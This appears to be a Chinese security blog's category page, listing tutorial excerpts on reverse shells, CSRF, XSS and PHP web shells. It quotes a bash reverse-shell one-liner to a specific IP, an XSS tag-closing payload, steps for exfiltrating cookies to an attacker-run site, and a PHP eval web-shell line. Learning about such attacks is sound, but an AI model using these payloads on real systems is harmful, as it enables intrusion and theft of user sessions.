随笔分类 - 杂
摘要:bash -i >& /dev/tcp/49.232.106.183/8080 0>&1 首先,bash -i是打开一个交互的bash,这个最简单。我们先跳过“>&”和“0>&1”,这两个是本文重点,等会再说。先来说“/dev/tcp/”。 /dev/tcp/是Linux中的一个特殊设备,打开这个文
阅读全文
摘要:一、定义 CSRF(Cross-site request forgery,跨站请求伪造)也被称为 One Click Attack(单键攻击)或者 Session Riding,通常缩写为 CSRF 或者 XSRF。 简单理解:用户已经登陆过一个网站并且完成了认证,下次登录这个网站就不用再进行认证了
阅读全文
摘要:一、通过闭合标签来进行xss注入 我们可以在url中发现传递了一个参数name=test,而且该参数在当前web页面进行了回显,我们观察可以发现回显内容在h2标签里面,所以我们的payload可以通过闭合h2标签来进行xss注入:?name=1</h2><script>alert('xss');</
阅读全文
摘要:1.首先在自己的机器上构建Web站点(49.232.106.183:6789是我的映射的内网机器Web站点)用来接收窃取到的用户cookie 这里记得给一个写入权限从而可以成功写入cookie.txt当中。 2.构建恶意URL,这里注意可以将构建的URL进行加密(burpsuite或者harbar都
阅读全文
摘要:1.定义:跨站脚本攻击英文全称为 (Cross Site Script)缩写为 CSS,但是为了和层叠样式表 (Cascading Style Sheet) css 区分开来,所以在安全领域跨站脚本攻击叫做XSS 2.目的:获取用户cookie 3.基本步骤: (1)用户必须先登录然后有了cooki
阅读全文
摘要:<?php @eval($_POST['meng']); ?> 说明: @:错误控制符,即使出现错误,也无视出现的错误信息,继续执行下边的代码。 eval()函数:把字符串按照PHP 代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。 meng:名称可以随便定义,是接收菜刀或蚁剑通过 P
阅读全文